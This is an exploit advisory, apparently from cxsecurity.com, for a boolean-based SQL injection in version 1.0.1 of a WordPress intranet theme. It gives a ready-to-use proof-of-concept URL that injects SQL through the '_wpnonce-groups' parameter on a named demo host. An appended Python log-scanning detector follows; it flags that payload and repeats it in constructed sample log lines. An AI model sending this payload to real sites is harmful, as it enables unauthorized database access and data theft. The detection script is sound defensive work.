cera-intranet-community-theme SQL Injection

2020.01.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

===========================================================================================
# Exploit Title: cera-intranet-community-theme SQL Inj.
# Dork: N/A
# Date: 29-12-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://themeforest.net/item/cera-intranet-community-theme/24872621
# Software Link: https://themeforest.net/item/cera-intranet-community-theme/24872621
# Version: v1.0.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: N/A
===========================================================================================
# POC - SQLi (Boolean Based)
# Parameters : _wpnonce-groups
# Attack Pattern : https://intranet-dark.cera-theme.com/?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f%27/**/aNd/**/5468967=5468967/**/aNd/**/%276199%27=%276199
# GET Method : https://intranet-dark.cera-theme.com/?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f
===========================================================================================
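A detection check for the request pattern in the PoC above, added here as an example and not part of the original advisory: it scans web access-log lines and flags requests whose `_wpnonce-groups` value is anything other than a bare nonce. The 10-character lowercase-hex nonce shape, the combined log format and the sample log lines (constructed, using documentation IP addresses) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "_wpnonce-groups"               # parameter named in the advisory
NONCE_RE = re.compile(r"[0-9a-f]{10}")  # assumption: stock WordPress nonce shape
# Markers of boolean-based probing: inline comments, quotes, AND/OR comparisons.
SQLI_RE = re.compile(r"/\*.*?\*/|'|\b(?:and|or)\b.{0,40}?=", re.I | re.S)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return 'absent', 'ok', 'malformed' or 'sqli-probe' for one request URL."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)  # percent-decodes
    values = [v for k, v in pairs if k == PARAM]
    if not values:
        return "absent"
    verdict = "ok"
    for v in values:  # inspect every copy in case the parameter is repeated
        if NONCE_RE.fullmatch(v):
            continue
        if SQLI_RE.search(v):
            return "sqli-probe"
        verdict = "malformed"
    return verdict

def scan(log_lines):
    """Return (line_number, verdict) for every request that is not clean."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify(m.group(1))
        if verdict in ("malformed", "sqli-probe"):
            hits.append((n, verdict))
    return hits

# Constructed sample log; line 2 carries the attack pattern quoted in the advisory.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Dec/2019:10:00:01 +0000] "GET /?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Dec/2019:10:00:05 +0000] "GET /?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f%27/**/aNd/**/5468967=5468967/**/aNd/**/%276199%27=%276199 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Dec/2019:10:00:09 +0000] "GET /?_wpnonce-groups=45a424e69fzz HTTP/1.1" 200 5120',
    '203.0.113.7 - - [29/Dec/2019:10:00:12 +0000] "GET /wp-login.php HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```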


Copyright 2020, cxsecurity.com

 
